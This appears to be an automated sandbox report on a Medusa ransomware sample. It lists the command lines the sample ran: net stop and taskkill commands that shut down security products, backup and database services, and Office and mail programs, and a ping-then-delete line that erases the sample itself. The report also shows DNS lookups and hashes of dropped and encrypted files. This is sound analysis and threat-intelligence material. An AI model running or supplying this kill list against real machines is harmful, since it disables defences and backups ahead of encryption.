C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL80" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL57" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL57" /y

C:\Windows\SysWOW64\net.exe

net stop "ntrtscan" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ntrtscan" /y

C:\Windows\SysWOW64\net.exe

net stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net.exe

net stop "PDVFSService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "PDVFSService" /y

C:\Windows\SysWOW64\net.exe

net stop "POP3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "POP3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "RESvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "RESvc" /y

C:\Windows\SysWOW64\net.exe

net stop "sacsvr" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sacsvr" /y

C:\Windows\SysWOW64\net.exe

net stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVAdminService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVAdminService" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVService" /y

C:\Windows\SysWOW64\net.exe

net stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "SepMasterService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SepMasterService" /y

C:\Windows\SysWOW64\net.exe

net stop "ShMonitor" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ShMonitor" /y

C:\Windows\SysWOW64\net.exe

net stop "Smcinst" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Smcinst" /y

C:\Windows\SysWOW64\net.exe

net stop "SmcService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SmcService" /y

C:\Windows\SysWOW64\net.exe

net stop "SMTPSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SMTPSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "SNAC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SNAC" /y

C:\Windows\SysWOW64\net.exe

net stop "SntpService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SntpService" /y

C:\Windows\SysWOW64\net.exe

net stop "sophossps" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sophossps" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLWriter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLWriter" /y

C:\Windows\SysWOW64\net.exe

net stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "svcGenericHost" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "svcGenericHost" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_filter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_filter" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_service" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update_64" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update_64" /y

C:\Windows\SysWOW64\net.exe

net stop "TmCCSF" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TmCCSF" /y

C:\Windows\SysWOW64\net.exe

net stop "tmlisten" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "tmlisten" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKey" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKey" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "W3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "W3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "WRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net stop "EhttpSrv" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EhttpSrv" /y

C:\Windows\SysWOW64\net.exe

net stop "ekrn" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ekrn" /y

C:\Windows\SysWOW64\net.exe

net stop "ESHASRV" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ESHASRV" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "AVP" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AVP" /y

C:\Windows\SysWOW64\net.exe

net stop "klnagent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "klnagent" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "kavfsslp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "kavfsslp" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFSGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFSGT" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFS" /y

C:\Windows\SysWOW64\net.exe

net stop "mfefire" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfefire" /y

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM zoolz.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM agntsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbeng50.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbsnmp.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM encsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM excel.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefoxconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM infopath.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM isqlplussvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msaccess.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msftesql.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mspub.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopqos.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-nt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-opt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocautoupds.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocomm.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocssd.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM onenote.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM oracle.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM outlook.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM powerpnt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqbcoreservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlagent.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlbrowser.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlservr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlwriter.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM steam.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM synctime.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tbirdconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat64.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thunderbird.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM visio.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM winword.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM wordpad.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM xfssvccon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tmlisten.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM PccNTMon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM CNTAoSMgr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Ntrtscan.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3264 -ip 3264

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 4408

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

F:\!!!READ_ME_MEDUSA!!!.txt

MD5 059811161d1eb0b9c131d4ca58fb273e
SHA1 137cda40b70978a85f34afcd3e8deac116cfe460
SHA256 e2cfaba956d1da00e2f2ab03474876e7d88e5b746c5c38932af32d6abe85d90b
SHA512 73770f346044da39220bbc0c47e271562d394f14b54f30391af15f09df9d7b0a90adcc06745a5b3681c182ec1db03998cbb6d1f100e81626eae87cddd6097fdd

C:\$Recycle.Bin\S-1-5-21-945322488-2060912225-3527527000-1000\desktop.ini

MD5 0697215b7346df56e37bd31fe9ed97e6
SHA1 b80dcc3878409b70d460e892bed974aec83acd6d
SHA256 3665303e9c7b0cad21a8caa438cba83d8b89094b9c8cebfaba5c4b43496e8e91
SHA512 acc6a7945e73970d152568ad1fa81c49b9c581ee094190db3298fe58e309f0099ac7aef087e1633330f5a2070f68bf54f477732b9f81d662d8c044ef4422cdff

C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.MEDUSA

MD5 28f78ceb366eb21cfcaa41f542522822
SHA1 5918f52a0c58ceaee04005b92ab9064571b5d4c4
SHA256 f7bd79320007e305c7efdcd879e499040f5d9c1470e7c941a5f588bcf6ffa53c
SHA512 b5ece9ee398efd4b7791f1953435bf97d383c62e3cb662501aba83bf2a5dc7aac9ebc5bf780648185c8e7c7a672406b12d67115ebebb02e6cb964b4733c25218